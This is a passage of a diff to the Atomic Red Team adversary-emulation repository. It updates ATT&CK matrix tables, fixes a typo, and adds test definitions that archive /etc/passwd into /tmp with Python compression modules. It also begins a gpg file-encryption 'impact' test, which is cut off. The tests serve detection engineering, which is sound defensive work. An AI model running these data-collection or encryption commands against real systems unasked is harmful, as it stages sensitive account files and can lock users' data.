+| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Add-ins [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Groups [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Library](../../T1560.002/T1560.002.md) | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Destruction](../../T1485/T1485.md) |
+| Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Additional Cloud Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Command History](../../T1070.003/T1070.003.md) | Cloud Instance Metadata API [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Infrastructure Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Encrypted for Impact](../../T1486/T1486.md) |
 | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | JavaScript/JScript [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Linux)](../../T1053.001/T1053.001.md) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Linux or Mac System Logs](../../T1070.002/T1070.002.md) | Credential Stuffing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Service Dashboard [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Audio Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious File [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Credentials In Files](../../T1552.001/T1552.001.md) | Cloud Service Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | SSH [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Automated Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS Calculation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | Compile After Delivery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Credentials from Password Stores [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | SSH Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Clipboard Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Direct Network Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Native API [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Credentials from Web Browsers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Groups [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Confluence [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Obfuscation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Device CLI [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Extensions](../../T1176/T1176.md) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Snapshot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Email Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Staged [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Dead Drop Resolver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Python [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [File and Directory Discovery](../../T1083/T1083.md) | VNC [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Cloud Storage Object [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Fronting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Python](../../T1059.006/T1059.006.md) | Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [File and Directory Discovery](../../T1083/T1083.md) | VNC [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Cloud Storage Object [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Fronting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Phishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Delete Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Keylogging](../../T1056.001/T1056.001.md) | [Local Account](../../T1087.001/T1087.001.md) | Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Configuration Repository [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration over USB [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Spearphishing Attachment [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scripting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Compromise Client Software Binary [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Deobfuscate/Decode Files or Information [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Groups](../../T1069.001/T1069.001.md) |  | Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dynamic Resolution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | Disable Cloud Logs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Service Scanning](../../T1046/T1046.md) |  | Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Encrypted Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Firmware Corruption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |

atomics/Indexes/Matrices/matrix.md

@@ -4,8 +4,8 @@
 | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [AppleScript](../../T1059.002/T1059.002.md) | [.bash_profile and .bashrc](../../T1546.004/T1546.004.md) | [.bash_profile and .bashrc](../../T1546.004/T1546.004.md) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [/etc/passwd and /etc/shadow](../../T1003.008/T1003.008.md) | Account Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Automated Exfiltration](../../T1020/T1020.md) | Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Account Access Removal](../../T1531/T1531.md) |
 | Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Linux)](../../T1053.001/T1053.001.md) | [Accessibility Features](../../T1546.008/T1546.008.md) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Access Token Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Application Window Discovery](../../T1010/T1010.md) | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive Collected Data](../../T1560/T1560.md) | [Data Transfer Size Limits](../../T1030/T1030.md) | Asymmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Windows)](../../T1053.002/T1053.002.md) | [Account Manipulation](../../T1098/T1098.md) | Access Token Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | AS-REP Roasting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Bookmark Discovery](../../T1217/T1217.md) | [Distributed Component Object Model](../../T1021.003/T1021.003.md) | Archive via Custom Method [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | Bidirectional Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Add Office 365 Global Administrator Role [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Accessibility Features](../../T1546.008/T1546.008.md) | [Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | [Bash History](../../T1552.003/T1552.003.md) | Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Library [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Destruction](../../T1485/T1485.md) |
-| [Default Accounts](../../T1078.001/T1078.001.md) | Component Object Model [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Add-ins [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [BITS Jobs](../../T1197/T1197.md) | Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Groups [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internal Spearphishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encrypted for Impact [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Add Office 365 Global Administrator Role [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Accessibility Features](../../T1546.008/T1546.008.md) | [Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | [Bash History](../../T1552.003/T1552.003.md) | Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Library](../../T1560.002/T1560.002.md) | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Destruction](../../T1485/T1485.md) |
+| [Default Accounts](../../T1078.001/T1078.001.md) | Component Object Model [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Add-ins [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [BITS Jobs](../../T1197/T1197.md) | Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Groups [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internal Spearphishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Encrypted for Impact](../../T1486/T1486.md) |
 | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Additional Cloud Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [AppInit DLLs](../../T1546.010/T1546.010.md) | [Binary Padding](../../T1027.001/T1027.001.md) | Cached Domain Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Infrastructure Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Audio Capture](../../T1123/T1123.md) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DNS](../../T1071.004/T1071.004.md) | Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Application Shimming](../../T1546.011/T1546.011.md) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Instance Metadata API [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Service Dashboard [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Pass the Hash](../../T1550.002/T1550.002.md) | [Automated Collection](../../T1119/T1119.md) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS Calculation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Dynamic Data Exchange](../../T1559.002/T1559.002.md) | [AppInit DLLs](../../T1546.010/T1546.010.md) | [Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | [Bypass User Account Control](../../T1548.002/T1548.002.md) | [Credential API Hooking](../../T1056.004/T1056.004.md) | Cloud Service Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Pass the Ticket](../../T1550.003/T1550.003.md) | [Clipboard Data](../../T1115/T1115.md) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Direct Network Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
@@ -20,7 +20,7 @@
 | Supply Chain Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Native API](../../T1106/T1106.md) | [Browser Extensions](../../T1176/T1176.md) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Compiled HTML File](../../T1218.001/T1218.001.md) | Forced Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Share Discovery](../../T1135/T1135.md) | Shared Webroot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Transfer Data to Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Fast Flux DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Trusted Relationship [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Device CLI [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [COR_PROFILER](../../T1574.012/T1574.012.md) | Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [GUI Input Capture](../../T1056.002/T1056.002.md) | [Network Sniffing](../../T1040/T1040.md) | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | File Transfer Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [PowerShell](../../T1059.001/T1059.001.md) | [Change Default File Association](../../T1546.001/T1546.001.md) | Create Process with Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Control Panel](../../T1218.002/T1218.002.md) | [Golden Ticket](../../T1558.001/T1558.001.md) | [Password Policy Discovery](../../T1201/T1201.md) | Taint Shared Content [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Email Forwarding Rule [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | [Ingress Tool Transfer](../../T1105/T1105.md) | Reflection Amplification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-|  | Python [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Group Policy Preferences](../../T1552.006/T1552.006.md) | [Peripheral Device Discovery](../../T1120/T1120.md) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [GUI Input Capture](../../T1056.002/T1056.002.md) |  | [Internal Proxy](../../T1090.001/T1090.001.md) | [Resource Hijacking](../../T1496/T1496.md) |
+|  | [Python](../../T1059.006/T1059.006.md) | Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Group Policy Preferences](../../T1552.006/T1552.006.md) | [Peripheral Device Discovery](../../T1120/T1120.md) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [GUI Input Capture](../../T1056.002/T1056.002.md) |  | [Internal Proxy](../../T1090.001/T1090.001.md) | [Resource Hijacking](../../T1496/T1496.md) |
 |  | [Scheduled Task](../../T1053.005/T1053.005.md) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | Create Process with Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Permission Groups Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | VNC [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Junk Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 |  | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | Create Snapshot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Kerberoasting](../../T1558.003/T1558.003.md) | [Process Discovery](../../T1057/T1057.md) | Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Keylogging](../../T1056.001/T1056.001.md) |  | Mail Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 |  | Scripting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | [Keychain](../../T1555.001/T1555.001.md) | [Query Registry](../../T1012/T1012.md) | [Windows Remote Management](../../T1021.006/T1021.006.md) | LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Multi-Stage Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Service Stop](../../T1489/T1489.md) |

atomics/Indexes/index.yaml

@@ -2473,7 +2473,7 @@ privilege-escalation:
           type: String
           default: guest
         guest_password:
-          description: Specigy the guest password
+          description: Specify the guest password
           type: String
           default: Password123!
       executor:
@@ -11746,7 +11746,7 @@ persistence:
           type: String
           default: guest
         guest_password:
-          description: Specigy the guest password
+          description: Specify the guest password
           type: String
           default: Password123!
       executor:
@@ -23485,7 +23485,145 @@ collection:
       - Linux
       - macOS
       - Windows
-    atomic_tests: []
+      identifier: T1560.002
+    atomic_tests:
+    - name: Compressing data using GZip in Python (Linux)
+      auto_generated_guid: 391f5298-b12d-4636-8482-35d9c17d53a8
+      description: 'Uses GZip from Python to compress files
+
+'
+      supported_platforms:
+      - linux
+      input_arguments:
+        path_to_input_file:
+          description: Path to the file that you want to compress
+          type: Path
+          default: "/etc/passwd"
+        path_to_output_file:
+          description: Path of the file that you want your .gz file to be
+          type: Path
+          default: "/tmp/passwd.gz"
+      dependency_executor_name: bash
+      dependencies:
+      - description: 'Requires Python
+
+'
+        prereq_command: 'which_python=`which python`; $which_python -V
+
+'
+        get_prereq_command: ''
+      executor:
+        name: bash
+        elevation_required: false
+        command: '$which_python -c "import gzip;input_file=open(''#{path_to_input_file}'',
+          ''rb'');content=input_file.read();input_file.close();output_file=gzip.GzipFile(''#{path_to_output_file}'',''wb'',''compresslevel=6'');output_file.write(content);output_file.close();"
+
+'
+        cleanup_command: 'rm #{path_to_output_file}
+
+'
+    - name: Compressing data using bz2 in Python (Linux)
+      auto_generated_guid: c75612b2-9de0-4d7c-879c-10d7b077072d
+      description: 'Uses bz2 from Python to compress files
+
+'
+      supported_platforms:
+      - linux
+      input_arguments:
+        path_to_input_file:
+          description: Path to the file that you want to compress
+          type: Path
+          default: "/etc/passwd"
+        path_to_output_file:
+          description: Path of the file that you want your .bz2 file to be
+          type: Path
+          default: "/tmp/passwd.bz2"
+      dependency_executor_name: bash
+      dependencies:
+      - description: 'Requires Python
+
+'
+        prereq_command: 'which_python=`which python`; $which_python -V
+
+'
+        get_prereq_command: ''
+      executor:
+        name: bash
+        elevation_required: false
+        command: '$which_python -c "import bz2;input_file=open(''#{path_to_input_file}'',''rb'');content=input_file.read();input_file.close();bz2content=bz2.compress(content,compresslevel=9);output_file=open(''#{path_to_output_file}'',''w+'');output_file.write(bz2content);output_file.close();"
+
+'
+        cleanup_command: 'rm #{path_to_output_file}
+
+'
+    - name: Compressing data using zipfile in Python (Linux)
+      auto_generated_guid: 001a042b-859f-44d9-bf81-fd1c4e2200b0
+      description: 'Uses zipfile from Python to compress files
+
+'
+      supported_platforms:
+      - linux
+      input_arguments:
+        path_to_input_file:
+          description: Path to the file that you want to compress
+          type: Path
+          default: "/etc/passwd"
+        path_to_output_file:
+          description: Path of the file that you want your .zip file to be
+          type: Path
+          default: "/tmp/passwd.zip"
+      dependency_executor_name: bash
+      dependencies:
+      - description: 'Requires Python
+
+'
+        prereq_command: 'which_python=`which python`; $which_python -V
+
+'
+        get_prereq_command: ''
+      executor:
+        name: bash
+        elevation_required: false
+        command: '$which_python -c "from zipfile import ZipFile; ZipFile(''#{path_to_output_file}'',
+          mode=''w'').write(''#{path_to_input_file}'')"
+
+'
+        cleanup_command: 'rm #{path_to_output_file}
+
+'
+    - name: Compressing data using tarfile in Python (Linux)
+      auto_generated_guid: e86f1b4b-fcc1-4a2a-ae10-b49da01458db
+      description: 'Uses tarfile from Python to compress files
+
+'
+      supported_platforms:
+      - linux
+      input_arguments:
+        path_to_input_file:
+          description: Path to the file that you want to compress
+          type: Path
+          default: "/etc/passwd"
+        path_to_output_file:
+          description: Path of the file that you want your .tar.gz file to be
+          type: Path
+          default: "/tmp/passwd.tar.gz"
+      dependency_executor_name: bash
+      dependencies:
+      - description: 'Requires Python
+
+'
+        prereq_command: 'which_python=`which python`; $which_python -V
+
+'
+        get_prereq_command: ''
+      executor:
+        name: bash
+        elevation_required: false
+        command: "$which_python -c \"from zipfile import ZipFile; ZipFile('#{path_to_output_file}',
+          mode='w').write('#{path_to_input_file}')\" \n"
+        cleanup_command: 'rm #{path_to_output_file}
+
+'
   T1560.001:
     technique:
       created: '2020-02-20T21:01:25.428Z'
@@ -28923,7 +29061,7 @@ defense-evasion:
           type: String
           default: guest
         guest_password:
-          description: Specigy the guest password
+          description: Specify the guest password
           type: String
           default: Password123!
       executor:
@@ -43485,7 +43623,184 @@ impact:
       - root
       - SYSTEM
       x_mitre_version: '1.0'
-    atomic_tests: []
+      identifier: T1486
+    atomic_tests:
+    - name: Encrypt files using gpg (Linux)
+      auto_generated_guid: 7b8ce084-3922-4618-8d22-95f996173765
+      description: 'Uses gpg to encrypt a file
+
+'
+      supported_platforms:
+      - linux
+      input_arguments:
+        pwd_for_encrypted_file:
+          description: the password that you want for the encrypted file
+          type: String
+          default: passwd
+        encrypted_file_path:
